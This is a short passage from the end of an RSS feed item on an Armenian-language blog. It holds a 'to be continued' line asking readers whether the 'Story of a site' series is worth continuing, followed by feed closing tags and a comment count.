<p><strong>&#8212;&#8212; <span style="color: #ffffff;">Շարունակելի</span> &#8212;&#8211; <span style="color: #ffffff;">Խնդրում եմ գրել կարծիքներ, արժե՞ արդյոք շարունակել &#8220;Մի կայքի պատմություն&#8221; բաժնի մշակումը&#8230;</span><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://grigoryan.biz/blog/2009/09/28/mail-ru-nothing-imposible/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
